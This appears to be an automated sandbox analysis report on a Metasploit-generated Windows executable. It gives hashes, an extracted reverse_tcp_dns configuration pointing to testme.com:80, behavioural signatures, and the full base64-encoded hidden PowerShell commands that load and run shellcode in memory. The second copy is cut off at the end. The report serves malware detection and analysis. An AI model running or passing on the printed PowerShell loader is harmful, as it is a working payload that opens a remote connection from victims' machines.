Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
22-06-2024 21:48
Static task
static1
Behavioral task
behavioral1
Sample
03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
Resource
win10v2004-20240611-en
General
-
Target
03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe
-
Size
457KB
-
MD5
03f9fd2ed89de09d2dbed8de06f8fe76
-
SHA1
4abfa12b785713bcb8a8d07175114dc903196fc3
-
SHA256
ddb66647189270d6046b6c95e30900f83ffe9911e77a918dd50a6f09879d1624
-
SHA512
f11a7029308abaa10f5b5cda1c04997f24d3e275b101533a15aa74645b05ed102f448002bfdeb2df86ca6651ab707eaa20fa1e1835851dc18754b2fdeb9ff1d3
-
SSDEEP
6144:x9JLFprEWDl7s5t38dX6pKE4dU7kpoTcnFOHuln+Otc+EkzI8jSejCE8aKP3sGvt:x99gbP/GFK9ACwdag/2OuV8IRCg
Malware Config
Extracted
metasploit
encoder/shikata_ga_nai
Extracted
metasploit
windows/reverse_tcp_dns
testme.com:80
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Blocklisted process makes network request 8 IoCs
Processes:
powershell.exeflow pid process 3 2700 powershell.exe 3 2700 powershell.exe 3 2700 powershell.exe 3 2700 powershell.exe 3 2700 powershell.exe 3 2700 powershell.exe 3 2700 powershell.exe 3 2700 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2100 powershell.exe 1892 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2100 powershell.exe 1892 powershell.exe 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2100 powershell.exe Token: SeDebugPrivilege 1892 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exepowershell.exepowershell.exepowershell.execsc.exedescription pid process target process PID 1708 wrote to memory of 2100 1708 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe powershell.exe PID 1708 wrote to memory of 2100 1708 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe powershell.exe PID 1708 wrote to memory of 2100 1708 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe powershell.exe PID 1708 wrote to memory of 2100 1708 03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe powershell.exe PID 2100 wrote to memory of 1892 2100 powershell.exe powershell.exe PID 2100 wrote to memory of 1892 2100 powershell.exe powershell.exe PID 2100 wrote to memory of 1892 2100 powershell.exe powershell.exe PID 2100 wrote to memory of 1892 2100 powershell.exe powershell.exe PID 1892 wrote to memory of 2700 1892 powershell.exe powershell.exe PID 1892 wrote to memory of 2700 1892 powershell.exe powershell.exe PID 1892 wrote to memory of 2700 1892 powershell.exe powershell.exe PID 1892 wrote to memory of 2700 1892 powershell.exe powershell.exe PID 2700 wrote to memory of 2732 2700 powershell.exe csc.exe PID 2700 wrote to memory of 2732 2700 powershell.exe csc.exe PID 2700 wrote to memory of 2732 2700 powershell.exe csc.exe PID 2700 wrote to memory of 2732 2700 powershell.exe csc.exe PID 2732 wrote to memory of 2660 2732 csc.exe cvtres.exe PID 2732 wrote to memory of 2660 2732 csc.exe cvtres.exe PID 2732 wrote to memory of 2660 2732 csc.exe cvtres.exe PID 2732 wrote to memory of 2660 2732 csc.exe cvtres.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\03f9fd2ed89de09d2dbed8de06f8fe76_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7A